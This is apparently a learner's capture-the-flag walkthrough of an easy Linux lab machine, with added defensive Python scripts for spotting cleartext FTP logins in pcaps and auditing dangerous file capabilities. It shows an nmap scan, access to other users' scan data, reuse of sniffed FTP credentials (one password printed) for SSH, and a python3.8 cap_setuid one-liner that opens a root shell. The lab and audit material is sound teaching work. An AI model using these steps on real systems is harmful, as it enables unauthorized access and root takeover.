Note: I'm not an expert. I'm writing this blog just to document my learning journey.
Overview
Difficulty: Easy
Goal: Capture user.txt and root.txt flags
Focus Areas: PCAP analysis, FTP credential sniffing, capability-based privilege escalation
1. Reconnaissance
Nmap Scan
nmap -A 10.10.10.245 -oN cap.nmap
Findings:
- Port 21 (FTP): Open
- Port 22 (SSH): Open
- Port 80 (HTTP): Web server with a scan tool
2. Web Enumeration
Visit http://10.10.10.245 in your browser.
Observe Functionality
- You can run a "Security Snapshot", which redirects to /data/[scan_id]. Example path: /data/0
Try Other Scan IDs
- Visit /data/1, /data/2, etc.
- Observation: You can access other users' scans.
3. Analyze PCAP File
From one of the /data/[id] paths (likely /data/0), download a .pcap file.
- Save it as 1.pcap
Open in Wireshark
wireshark 1.pcap
Apply Filter
Use Wireshark filter:
ftp
Find Credentials
Look for:
USER nathan
PASS [password]
Right-click and follow the TCP stream to view the full conversation.
Suppose you find:
USER nathan
PASS [password]
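The Wireshark steps above are manual. The script below is an added example (not part of the original write-up) that does the same check programmatically from a defender's side: it walks a classic pcap file, decodes Ethernet/IPv4/TCP by hand with the standard library only, and reports every cleartext FTP login (USER followed by PASS towards port 21), with the password redacted to its length so the capture can be audited before it is shared. The sample capture at the bottom is constructed inline; the addresses, port and password in it are made up, and the user name reuses the one from the write-up.

```python
"""Find cleartext FTP logins in a pcap (added example, standard library only)."""
import struct

FTP_PORT = 21


def _iter_pcap_payloads(data):
    """Yield (src, dst, sport, dport, tcp_payload) for each IPv4/TCP frame in a classic pcap."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic == 0xA1B2C3D4:
        endian = "<"           # file written little-endian
    elif magic == 0xD4C3B2A1:
        endian = ">"           # file written big-endian
    else:
        raise ValueError("not a classic pcap file")
    off = 24                   # size of the global header
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        frame = data[off:off + incl_len]
        off += incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue           # not Ethernet + IPv4
        if frame[23] != 6:
            continue           # IP protocol field is not TCP
        ihl = (frame[14] & 0x0F) * 4
        src = ".".join(str(b) for b in frame[26:30])
        dst = ".".join(str(b) for b in frame[30:34])
        tcp = frame[14 + ihl:]
        if len(tcp) < 20:
            continue
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        data_off = (tcp[12] >> 4) * 4
        yield src, dst, sport, dport, tcp[data_off:]


def find_ftp_logins(pcap_bytes):
    """Return one dict per PASS command seen on the FTP control channel.

    Passwords are reported only by length: the purpose is to flag the leak,
    not to harvest the secret.
    """
    pending_user = {}          # (client, server) -> last USER argument
    findings = []
    for src, dst, sport, dport, payload in _iter_pcap_payloads(pcap_bytes):
        if dport != FTP_PORT or not payload:
            continue
        line = payload.split(b"\r\n", 1)[0].decode("ascii", "replace")
        verb, _, arg = line.partition(" ")
        key = (src, dst)
        if verb.upper() == "USER":
            pending_user[key] = arg
        elif verb.upper() == "PASS":
            findings.append({"client": src, "server": dst,
                             "user": pending_user.get(key, "?"),
                             "password_len": len(arg)})
    return findings


# --- constructed sample capture: one FTP login with made-up addresses/password ---
def _frame(src, dst, sport, dport, payload):
    """Build a minimal Ethernet/IPv4/TCP frame around a payload (checksums left zero)."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(int(x) for x in src.split(".")),
                     bytes(int(x) for x in dst.split(".")))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload


def build_sample_pcap():
    """Constructed pcap bytes: a client logging in to an FTP server in the clear."""
    frames = [
        _frame("192.0.2.10", "192.0.2.20", 40000, 21, b"USER nathan\r\n"),
        _frame("192.0.2.20", "192.0.2.10", 21, 40000, b"331 Please specify the password.\r\n"),
        _frame("192.0.2.10", "192.0.2.20", 40000, 21, b"PASS s3cret-demo\r\n"),
        _frame("192.0.2.20", "192.0.2.10", 21, 40000, b"230 Login successful.\r\n"),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # link type 1 = Ethernet
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    for hit in find_ftp_logins(build_sample_pcap()):
        print(f"cleartext FTP login {hit['client']} -> {hit['server']}: "
              f"user={hit['user']} password={'*' * hit['password_len']}")
```

Run it against a real file with `find_ftp_logins(open("1.pcap", "rb").read())`; pcapng files are not handled, so export the capture in the classic format first.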
4. SSH Access as Nathan
Use the FTP password to try SSH:
ssh nathan@10.10.10.245
Use the discovered password: cap@123
Get User Flag
cat ~/user.txt
User flag captured.
5. Privilege Escalation
Check for SUID/Capabilities
getcap -r / 2>/dev/null
What Does getcap Mean?
The getcap command lists Linux file capabilities, which are fine-grained permissions that can be assigned to executables.
getcap -r / 2>/dev/null
- -r /: Recursively check every file starting from root (/)
- 2>/dev/null: Hides "Permission denied" errors to keep output clean
You're looking for binaries with powerful capabilities like cap_setuid, which lets a program change its user ID (e.g., become root). If a binary like python3.8 has this capability, it can be abused to spawn a root shell.
These capabilities are separate from traditional SUID bits and are often overlooked.
Output Example
/usr/bin/python3.8 = cap_setuid+ep
Explanation
This means python3.8 has the capability to change its UID, so it can be used to become root.
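To show what getcap is actually reading, here is an added example (not code from the original write-up) that decodes the security.capability extended attribute the kernel stores on a file, renders it in getcap's cap_name+flags style, and flags capability sets a local user could turn into root. It is the audit-side counterpart of the manual check above: run it over a tree and it lists the same kind of finding as getcap -r, but already triaged. The two sample xattr values at the bottom are constructed here; the python3.8 one is built to match the write-up's output line, and the ping one shows a capability that is not flagged.

```python
"""Decode Linux file capabilities and flag dangerous ones (added example)."""
import os
import struct
import sys

# Capability numbers from <linux/capability.h> (only the ones named here).
CAP_NAMES = {
    0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search", 3: "cap_fowner",
    6: "cap_setgid", 7: "cap_setuid", 10: "cap_net_bind_service", 13: "cap_net_raw",
    16: "cap_sys_module", 19: "cap_sys_ptrace", 21: "cap_sys_admin",
}
# Any of these on a binary an unprivileged user can execute is a root-equivalent finding.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_chown", "cap_fowner", "cap_sys_module", "cap_sys_ptrace", "cap_sys_admin"}

VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_FLAGS_EFFECTIVE = 0x000001


def _bits_to_names(words):
    """Turn the 32-bit words of a capability set into a set of cap_* names."""
    names = set()
    for word_index, word in enumerate(words):
        for bit in range(32):
            if word & (1 << bit):
                num = word_index * 32 + bit
                names.add(CAP_NAMES.get(num, f"cap_{num}"))
    return names


def decode_vfs_cap(raw):
    """Decode a security.capability value into (permitted, inheritable, effective)."""
    magic_etc, = struct.unpack_from("<I", raw, 0)
    revision = magic_etc & VFS_CAP_REVISION_MASK
    effective = bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE)
    if revision == 0x01000000:
        n_words = 1            # v1: one 32-bit word per set
    elif revision in (0x02000000, 0x03000000):
        n_words = 2            # v2/v3: two words per set (v3 appends a rootid we ignore)
    else:
        raise ValueError(f"unknown VFS cap revision {revision:#x}")
    permitted, inheritable = [], []
    for i in range(n_words):
        p, inh = struct.unpack_from("<II", raw, 4 + 8 * i)
        permitted.append(p)
        inheritable.append(inh)
    return _bits_to_names(permitted), _bits_to_names(inheritable), effective


def format_caps(permitted, inheritable, effective):
    """Render like getcap, e.g. 'cap_setuid+ep'; names sharing the same flags are grouped."""
    flags_for = {}
    for name in permitted | inheritable:
        flags = ""
        if effective and name in permitted:
            flags += "e"
        if name in inheritable:
            flags += "i"
        if name in permitted:
            flags += "p"
        flags_for.setdefault(flags, []).append(name)
    return " ".join(",".join(sorted(names)) + "+" + flags
                    for flags, names in sorted(flags_for.items()))


def assess(path, raw):
    """Return a finding for one file: its getcap-style text and the dangerous subset."""
    permitted, inheritable, effective = decode_vfs_cap(raw)
    return {"path": path,
            "caps": format_caps(permitted, inheritable, effective),
            "dangerous": sorted((permitted | inheritable) & DANGEROUS)}


def scan_tree(root="/"):
    """Walk a tree like `getcap -r` and keep only files carrying a dangerous capability."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                raw = os.getxattr(path, "security.capability", follow_symlinks=False)
            except OSError:
                continue       # no capability xattr, permission denied, or file vanished
            finding = assess(path, raw)
            if finding["dangerous"]:
                findings.append(finding)
    return findings


# Constructed sample xattr values (v2 header with the effective flag set).
SAMPLE_PYTHON_XATTR = struct.pack("<IIIII", 0x02000001, 1 << 7, 0, 0, 0)   # cap_setuid
SAMPLE_PING_XATTR = struct.pack("<IIIII", 0x02000001, 1 << 13, 0, 0, 0)    # cap_net_raw

if __name__ == "__main__":
    for sample, path in ((SAMPLE_PYTHON_XATTR, "/usr/bin/python3.8"), (SAMPLE_PING_XATTR, "/usr/bin/ping")):
        print(assess(path, sample))
    for finding in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "/"):
        print(f"{finding['path']} = {finding['caps']}  <-- {', '.join(finding['dangerous'])}")
```

The fix on the defending side is the same whichever tool finds it: remove the capability with `setcap -r /usr/bin/python3.8` (or scope it to a dedicated binary that only privileged users can execute), and run this scan, or getcap -r, as part of routine host auditing.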
Exploit It
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Now check:
whoami
# root
Get Root Flag
cat /root/root.txt
Root flag captured.
Summary
| Step | Description |
|---|---|
| Recon | Nmap scan reveals FTP, SSH, HTTP |
| Web Enum | Snapshot data exposed at /data/0 |
| PCAP | FTP creds leaked in packet capture |
| User Shell | SSH access with FTP creds |
| Priv Esc | Python binary with cap_setuid lets us become root |
Flags
- User Flag: Obtained from /home/nathan/user.txt
- Root Flag: Obtained from /root/root.txt
Lessons Learned
- PCAPs can leak sensitive data if not secured
- FTP transmits credentials in plaintext
- Linux capabilities can be as dangerous as SUID if misconfigured
- Always restrict access to debug or internal diagnostic tools